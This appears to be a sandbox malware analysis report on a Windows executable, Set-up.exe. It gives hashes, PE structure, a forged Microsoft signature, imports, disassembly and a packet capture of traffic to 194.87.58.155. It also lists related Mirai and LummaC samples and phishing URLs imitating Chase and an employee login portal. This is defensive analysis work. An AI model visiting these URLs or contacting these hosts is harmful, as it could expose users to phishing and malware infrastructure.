	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	securedoc_20241220T111852.html	Get hash	malicious	Unknown	Browse	44.219.110.92
	https://visa-pwr.com/	Get hash	malicious	Unknown	Browse	3.208.228.173
	botx.mips.elf	Get hash	malicious	Mirai	Browse	52.0.196.218
	botx.x86.elf	Get hash	malicious	Mirai	Browse	34.206.198.108
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	54.87.199.101
	botx.ppc.elf	Get hash	malicious	Mirai	Browse	54.56.4.115
RELCOM-ASRelcomGroup19022019RU	Set-up.exe	Get hash	malicious	Unknown	Browse	194.87.58.155
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	arm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	mips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	ppc.elf	Get hash	malicious	Unknown	Browse	194.58.66.244

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.386639140633175
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	7'101'064 bytes
MD5:	ae8ed41bd6aaae48ca2b4615d20f52df
SHA1:	c5d5cfc1e82f7cc7d9c1cf4ed52c1866b35b0bb7
SHA256:	9633f8eb37d7823206d9f14ad5dfc162c2c757f89726a9f917a42b7edc63244d
SHA512:	90dafac24cd260491946ec7efd74cb2f1a9cd8c15ae10aa930fd5788601e8cdfa1b776c05bbd56b4772c1116570c3d3178d55866e7a6708056a81b1a3887550a
SSDEEP:	49152:ZW6ZBOTAG7aw9Z/iq3bfs8KMEcqtoezBm6ruFu+4wvcefb5oq7WKhgMy7v3Kybux:ZWO8aw7j3DXwcUltmOuvqJK3yz8J
TLSH:	50661861EE8791F9C68305715016B77F6E31AF009C29CFB6CF91FB60C672A12E94E618
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg...............(.\N..Pl..2...........pN...@...........................l.......l...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6772D5DF [Mon Dec 30 17:18:23 2024 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 17:01:06 21/08/2025 17:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	CAAD555B3F3BFF8068AEF82982478996
Thumbprint SHA-1:	C0F8301C5B214E2D5809CDE74E6904FAADEC01D4
Thumbprint SHA-256:	54B5E6498A4D19FA2C23C17EDD3542E4DA317021FC264A62F29B837732D50BF7
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00A91658h], 00000001h
jmp 00007FF4F8E2D8B6h
nop
mov dword ptr [00A91658h], 00000000h
jmp 00007FF4F8E2D8A6h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FF4F91B5116h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00938000h
call dword ptr [00A939A8h]
sub esp, 04h
test eax, eax
je 00007FF4F8E2DC75h
mov ebx, eax
mov dword ptr [esp], 00938000h
call dword ptr [00A93A1Ch]
mov edi, dword ptr [00A939BCh]
sub esp, 04h
mov dword ptr [00A8F028h], eax
mov dword ptr [esp+04h], 00938013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00938029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008E7004h], eax
test esi, esi
je 00007FF4F8E2DC13h
mov dword ptr [esp+04h], 00A8F02Ch
mov dword ptr [esp], 00A8A104h
call esi
mov dword ptr [esp], 00401580h
call 00007FF4F8E2DB63h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x693000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6c5400	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x698000	0x34d78	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x67fc80	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x693814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4e5b1c	0x4e5c00	7bbcd128f71d214c2f29db413ac5c236	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4e7000	0x508c4	0x50a00	96672f8c731cab8f63e4186721b1ffd2	False	0.07211421996124032	dBase III DBT, version number 0, next free block index 10, 1st item "\321L{"	0.9772299122675231	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x538000	0x151ab8	0x151c00	5b8f3a539641ddb5d96dfd3fbcd16730	False	0.4205666520170244	data	6.2763796853009515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x68a000	0x4d64	0x4e00	33fa595056138dabb89943d42c42f28f	False	0.31986177884615385	data	4.916502486158787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x68f000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x693000	0x2dac	0x2e00	cee0450c995256983c3c16af4e4ca77a	False	0.36837635869565216	data	5.342966000960136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x696000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x697000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x698000	0x34d78	0x34e00	c4cc72fb886458d350b272e885c309f6	False	0.4961537751182033	data	6.657792385198591	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 00:32:58.602870941 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:58.602905989 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:58.602967024 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:58.606178999 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:58.606189966 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.298430920 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.299170971 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.299184084 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.300518036 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.300587893 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.302103996 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.302165985 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.309395075 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.309401989 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.363308907 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.831645012 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.831772089 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:32:59.831995010 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.833048105 CET	49730	443	192.168.2.4	52.202.253.164
Dec 31, 2024 00:32:59.833066940 CET	443	49730	52.202.253.164	192.168.2.4
Dec 31, 2024 00:33:02.966679096 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.971477985 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.971559048 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.972390890 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.977246046 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977277040 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977292061 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977300882 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977308989 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977345943 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.977387905 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.977407932 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977416992 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977431059 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977437973 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.977473021 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.981930017 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.981987000 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.982121944 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.982180119 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.982182026 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.982188940 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.982198954 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.982213974 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.982222080 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:02.982243061 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:02.982269049 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.025032043 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.025193930 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.073311090 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.073389053 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.124761105 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.125004053 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.172936916 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.173094034 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.221045971 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.221132994 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.269021034 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.269231081 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.320913076 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.321033955 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.368798018 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.368999004 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.416805983 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.417052984 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.421319008 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.421542883 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.421863079 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.421932936 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.426537991 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426546097 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426553965 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426557064 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426606894 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426615953 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426623106 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426631927 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426652908 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426661015 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426667929 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426676989 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426714897 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.426765919 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.426843882 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.426903009 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.426992893 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427001953 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427011013 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427067041 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.427088976 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427151918 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427196980 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427232981 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427355051 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427361965 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427402020 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427588940 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427598000 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427639961 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427650928 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427746058 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.427755117 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431505919 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431555033 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431564093 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431603909 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431641102 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431655884 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431678057 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431704044 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431740046 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431807995 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431816101 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431823969 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431834936 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431842089 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431849003 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431863070 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431866884 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431922913 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431930065 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431937933 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.431941032 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.432014942 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.446213961 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.446290016 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.446439028 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.451072931 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451109886 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451134920 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.451148987 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451153994 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.451158047 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451185942 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.451196909 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.451215982 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451225042 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451236963 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451245070 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451308966 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.451323986 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451333046 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451337099 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451339960 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451375961 CET	80	49731	194.87.58.155	192.168.2.4
